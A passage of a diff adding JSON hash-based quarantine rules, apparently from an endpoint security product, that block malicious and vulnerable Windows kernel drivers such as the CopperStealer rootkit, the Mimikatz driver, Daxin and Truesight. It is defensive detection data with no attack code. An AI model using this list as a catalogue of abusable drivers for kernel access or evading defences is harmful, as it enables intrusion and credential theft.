+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977243Z",
+ "creation_date": "2026-03-23T11:45:29.977245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1cb86386757b947b39086cc8639da988f6e8018ca9995dd669bdc03c8d39d7d",
+ "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e677db8-0185-54be-a208-ae0924a05730",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147466Z",
+ "creation_date": "2026-03-23T11:45:31.147468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39387167827471754b84cb209e9bd06b268173b53d64f8106a2fdf8ae872df42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e712d09-5b84-5a6a-9432-bf2cf89a0927",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807539Z",
+ "creation_date": "2026-03-23T11:45:31.807541Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a688ece8c13c9250de44f982cbcbe8ed7460aa4173cfd51a1f8ce0490ead33f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e8096a7-8140-5188-b445-4c000ad2a6f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478015Z",
+ "creation_date": "2026-03-23T11:45:30.478019Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72876e44135f9b49932b547129e32acf9ce3df98a3f9c5c31355160f6d06ca3c",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2e8d0e7b-d6b8-5ff2-b194-0f79157c2275",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150513Z",
+ "creation_date": "2026-03-23T11:45:31.150515Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150520Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca151932a897c90240b0d5ed97b3e5f655b7383091b3d66bd54123ce3f7520bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ea6abff-85b6-51b6-a3ea-e727903b045c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146854Z",
+ "creation_date": "2026-03-23T11:45:32.146856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "174c8d771d31d70fc95448e961a395f5ceb7658f0cc381a718fb3b854cde4efe",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ea92f52-ebc0-5178-a2ed-d2f401544dd7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832461Z",
+ "creation_date": "2026-03-23T11:45:30.832463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832469Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f5376806f970b67dc5e8c5a74600cfa69c26d668141b353a636c9d8cd919f0f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ebb61ad-e782-5512-8a5a-a2e03b8db716",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613598Z",
+ "creation_date": "2026-03-23T11:45:29.613599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0728184caead84f2e88777d833765f2d8af6a20aad77b426e07e76ef91f5c3f",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ec5b4a5-2582-5d0d-8fb2-fee352e0c364",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621229Z",
+ "creation_date": "2026-03-23T11:45:29.621231Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621236Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c4db6ee983fd4fa74f8212031ade343a1b9abdb258d05bef1aabd7ab49fbc16",
+ "comment": "Logitech CoreTemp vulnerable driver (aka LgCoreTemp.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ed76bf2-8029-5fc5-a53d-1cb252fa25e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481229Z",
+ "creation_date": "2026-03-23T11:45:31.481233Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d2310cdc96a3411ee73044a5cc9a5c3672f61f5c496d04d76f6723646cf237f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2edac3ac-7c75-5a70-aadd-bb0783b328ea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150907Z",
+ "creation_date": "2026-03-23T11:45:31.150908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17aa5ffb7f675645d0813a1caf6acdcbc4d6bf453a627c7535d01eb93cdd0ecc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2ee9f0e7-4dc5-58b5-a040-a23f5b60e768",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145639Z",
+ "creation_date": "2026-03-23T11:45:32.145641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145647Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92f9341304bfb77158d29397d1b9695dee0d001ab5f119a8b49f49fa15e0cd98",
+ "comment": "Vulnerable Kernel Driver (aka psmounterex.sys) [https://www.loldrivers.io/drivers/0f64bf7a-2ef2-45ea-af7d-4e7c87d98777/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2efdd326-d568-5627-a05b-b369780b52c9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463127Z",
+ "creation_date": "2026-03-23T11:45:30.463130Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7aa8abdda8a68b8418e86bef50c19ef2f34bc66e7b139e43c2a99ab48c933be",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2efe7a04-6110-5ee0-841b-cd2a20808162",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617931Z",
+ "creation_date": "2026-03-23T11:45:29.617933Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617938Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1e9ec6b3e83055ae90f3664a083c46885c506d33de5e2a49f5f1189e89fa9f0a",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f0414de-38a4-526f-8074-2b55193e2324",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140492Z",
+ "creation_date": "2026-03-23T11:45:31.140494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140500Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "455f3eb28887f0b6d55c66f8607ee771f6103a39d8cb3af3dd1cc5f4e1266293",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f0bcb26-7b00-5f8c-a586-4ac4afc478b8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984888Z",
+ "creation_date": "2026-03-23T11:45:29.984890Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984896Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f17ce4f-1338-5ae9-bd08-63d200e0e42e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604609Z",
+ "creation_date": "2026-03-23T11:45:29.604610Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604616Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376",
+ "comment": "Malicious Kernel Driver (aka daxin_blank3.sys) [https://www.loldrivers.io/drivers/9748d5c8-62dd-474b-a336-0aadb49e5ff9/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f2372d9-1dcd-5869-823b-448810e78f02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155823Z",
+ "creation_date": "2026-03-23T11:45:31.155825Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155830Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e9f1c346fc6680ca2826dd85307c200ff199a83fa1f03b28cd14792007e39534",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f2c126e-7fd7-5b05-af91-2ca69a1f26ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622263Z",
+ "creation_date": "2026-03-23T11:45:29.622265Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622270Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "545190e8b2a910e153b12559a9875154a1b40d6424cb4a6299a84b2dc99df700",
+ "comment": "BioStar Racing GT EVO vulnerable driver (aka BS_RCIO64.sys) [CVE-2021-44852] [https://nephosec.com/biostar-exploit/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f2d992b-5616-51ac-a879-7e1b61b03880",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149618Z",
+ "creation_date": "2026-03-23T11:45:31.149621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149629Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4af5d4cb95c32b9f8041a448c3766b658f4d6918f259fa75f1d0c92c711e9528",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f2fa31b-9e29-51ba-985f-c83f5a170f16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971042Z",
+ "creation_date": "2026-03-23T11:45:29.971045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971054Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0867af893422b7191e77907de58faf787d4763cc7e9a2a3a91c72f1995a9c3f3",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f371a08-0c0e-54be-9a47-c17c6dea0da5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818136Z",
+ "creation_date": "2026-03-23T11:45:30.818138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b1e4455499c6a90ba9a861120a015a6b6f17e64479462b869ad0f05edf6552de",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2f4a6408-4fdd-5225-8de4-b1928710e84c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
